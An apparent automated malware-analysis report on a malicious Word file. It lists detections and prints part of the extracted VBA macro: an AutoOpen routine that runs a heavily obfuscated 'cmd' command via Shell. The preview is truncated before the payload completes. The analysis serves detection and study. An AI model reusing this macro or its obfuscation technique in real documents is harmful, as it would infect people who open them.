Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic
The sample is a malicious Office document containing a VBA macro. Its AutoOpen subroutine, which Word runs automatically when the document is opened, is designed to execute a command. The macro builds the command string by concatenating many short string literals and character codes, a common obfuscation technique used for payload delivery. Because the extracted source is truncated and obfuscated, the exact command is not fully discernible, but it clearly involves command execution through a Shell call.
Heuristics (5)

- ClamAV: Doc.Malware.Valyria-6788933-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6788933-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5121 bytes |

SHA-256 of macros.bas: ca11285dfecddc2fc4404e64d11fcf5dbc098f86f04c4fd71e014b9e3ec30ce0
Preview: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "okomIHPwQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName CLng(5)
TypeName CDbl(hfiRhz)
TypeName Svuvp
TypeName 6
TypeName Atn(6)
TypeName Sin(fSzbHl + iqiGJ - isOmw / qZzpZM)
Shell@ CStr("c") + CStr("m") + VdciGpRrUkG + dViqhcwQ + mAPzN + FvKNJS + mLucjjaWUQ + vfUuOZkCjkiiDC, 734103084 - 734103084
TypeName CDate(dXPCdp + 91808)
TypeName CStr(iZXDVt)
End Sub
Attribute VB_Name = "zvtcvLmUElCh"
Function mAPzN()
On Error Resume Next
TypeName CStr(ffUCL - GDBIAb)
TypeName 9419
TypeName 230
ZNdrIEF = "d /V:O" + "/C" + CStr(Chr(UGFAzWsOAkKCJn + qiqpsZYOD + 34 + BjYhOGIIQBlz + SKLaSzHMAEitX)) + "set 1" + "fT=s" + "Rii" + "pEjjsz" + "IuJp" + "QcqPiaZL" + "zS" + "bhzXO" + "tYzsBq8GrU" + ";41g9yk " + "-}" + "x{2/@"
TypeName Chr(GjJYi / Hclrv / 67867 / 51631)
TypeName Sgn(wCRFJ + 99211 - 78276 / EKPiCI)
oczij = "CTo:.DVn" + "mdN" + "6w'" + "lW" + ",f+A(e" + "$" + "v=)F\&" + "&for " + "%f i" + "n (1" + "3"
TypeName Log(Lhlhq * ZqzPsv)
TypeName Hex(19)
oUpKvvAbNTw = ";56;6" + "6;75;37;32" + ";25;" + "75;68" + ";68;46;7" + "6;18" + ";36;" + "1;78"
TypeName 2891
TypeName 367452274
INDHBisfjjU = ";61;" + "75;66;4" + "7;56;24;7;" + "75;15;29;4" + "6;64;75;2" + "9;58;69" + ";75;" + "24;54;68;" + "18;75;" + "61" + ";29;" + "39;76;1;38" + ";55;78"
TypeName Sgn(EFFwI)
TypeName ChrW(88720 - Dahkuo)
pWjfuaHGd = ";67;25" + ";29;29;1" + "3;57" + ";5" + "2;52;56;" + "61" + ";75;61" + ";18;42;25" + ";29;68" + ";18"
TypeName wPhWmA
TypeName Atn(bGmPGk)
qhrlpJKsT = ";7" + "1;75;" + "58;" + "15;56;62;" + "52;43;3" + "4;60;34;62" + ";29;"
TypeName 449
TypeName Sgn(KEadz)
TypeName Oct(WLVluT + nkOSDA + 58725 - TswmiG)
RkHJkGpN = "53;2" + "5;" + "29;29;" + "13;5" + "7;52;52;" + "29;25;75;" + "13;19;37;" + "45;" + "41;40" + ";58;1" + "5;5"
TypeName CBool(RizDDM)
TypeName 9
rkSBUoCkpo = "6;6" + "2" + ";52;" + "5" + "6;40" + ";69;59" + ";43;53;25" + ";29" + ";" + "29;1" + "3"
TypeName ChrB(46985 * WmjYkh / KMmYfS + ckmkh)
TypeName 8
TypeName CBool(Owpift)
ozuLYP = ";5" + "7;52;52;2" + "9;75;3" + "2;29;15;1" + "9;37" + ";18;56;6" + "1;58;2" + "4;75;52"
mAPzN = ZNdrIEF + oczij + oUpKvvAbNTw + INDHBisfjjU + pWjfuaHGd + qhrlpJKsT + RkHJkGpN + rkSBUoCkpo + ozuLYP
TypeName Sqr(3)
TypeName Int(15341 + qEvIHz * 25438 * GUJfz)
End Function
Function FvKNJS()
On Error Resume Next
TypeName 128786316
TypeName jTDGU
TypeName Sqr(314)
FuTvABWI = ";35;61;65" + ";65;5;5" + "9;31;53;2" + "5;" + "29;29;13" + ";57" + ";52;5" + "2;"
TypeName 8223
TypeName 277570865
TypeName 657
zlkwtwU = "31;56;75;" + "68;56;66;6" + "1;75;4" + "4;58;15;5" + "6;6" + "2;52;55;" + "24;5" + "3;25;29" + ";29;1" + "3;57;52;52" + ";2" + "9"
TypeName Round(751)
TypeName CDbl(tiizi * lWDMZM)
TypeName 6058
oYMjvaErB = ";37;18;" + "13;29;11;3" + "7;58;" + "15;56;62;5" + "8;24;37;52" + ";64;" + "64;65;45;1" + "8;44;27" + ";67;58;23" + ";13;68;18" + ";29;7"
TypeName Log(ORLUUk)
TypeName Rnd(aHEvM)
QjZYOo = "4" + ";67;53;6" + "7;79;39;" + "76;20;7" + "3;80;4" + "6;78" + ";46;67;65" + ";51;65" + ";67;39;76" + ";63;62;15;" + "78;7" + "6"
TypeName KPqjHq
TypeName kbaBB
TypeName ChrB(284555372)
jKtGK = ";75;" + "61;77" + ";57;29" + ";75;62;1" + "3;72" + ";67;8" + "1;67;72;76" + ";20;7" + "3;80;" + "72;67;5" + "8;75;" + "49;75;67;3" + "9;71;56;37"
TypeName 17
TypeName CSng(64)
WdhLuQW = ";75" + ";19;15;25" + ";74" + ";76;" + "31;" + "34;21;46" + ";18;" + "6" + "1;46;"
TypeName tCYzcj
TypeName hbqGV
bSQnO = "76;1;" + "3" + "8;55;7" + "9;" + "50;29;37" + ";44"
TypeName ChrW(vjYdb - FuUJk)
TypeName CStr(10)
AZUhjro = ";50;76" + ";18;" + "36;1" + ";5" + "8;59" + ";56;66;61;" + "68" + ";56;1" + "9;63;" + "80;18;6" + "8;75;74"
TypeName Sqr(8)
TypeName DcKNhC
TakAob = "
```

... (truncated)